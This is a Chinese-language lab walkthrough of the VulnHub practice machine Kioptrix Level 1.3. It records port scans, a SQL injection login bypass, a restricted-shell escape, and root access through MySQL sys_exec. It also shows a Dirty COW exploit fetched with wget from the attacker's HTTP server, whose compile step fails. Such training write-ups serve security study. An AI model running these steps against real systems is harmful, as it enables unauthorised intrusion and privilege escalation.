PJzhang:vulnhub靶机Kioptrix系列KIOPTRIX:LEVEL 1.3
猫宁~~~
地址:https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
打开vmwareworkstation---创建新的虚拟机---稍后安装操作系统---操作系统和版本都是其他---完成---编辑虚拟机设置---删除原有硬盘,添加新硬盘---使用现有虚拟硬盘---选择Kioptrix4_vmware.vmdk---网络模式为桥接
kali linux IP 192.168.100.6
nmap 192.168.100.0/24
发现靶机的IP 192.168.100.19
nmap -sV -p1-65535 192.168.100.19
22/tcp open ssh
OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http
Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open netbios-ssn
Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn
Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
访问http://192.168.100.19/,有登录框
访问http://192.168.100.19/john/,可以跳转登录框,用户名john
nikto -h 192.168.100.19
john,'or '1'='1,成功登录,显示控制面板帐户密码john,MyNameIsJohn
python -c 'import pty;pty.spawn("/bin/bash")'
被禁止使用
echo os.system("/bin/bash")
成功进入正常交互界面
john@Kioptrix4
cd /var/www
cat checklogin.php
发现数据库用户名密码为空
mysql -uroot -p
select sys_exec("usermod -aG admin john");
exit
sudo su root,输入密码MyNameIsJohn
成为root帐户
脏牛提权思路
uname -a
Linux Kioptrix4 2.6.24-24-server
searchsploit dirty
https://www.exploit-db.com/exploits/40839
40839.c
cp /usr/share/exploitdb/exploits/linux/local/40839.c /root/
python -m SimpleHTTPServer 6666
cd /tmp
wget http://192.168.100.6:6666/40839.c
Linux Kernel 2.6.22<3.9
gcc -pthread 40839.c -o muma -lcryp
./muma
可惜缺少,gcc,pentium-builder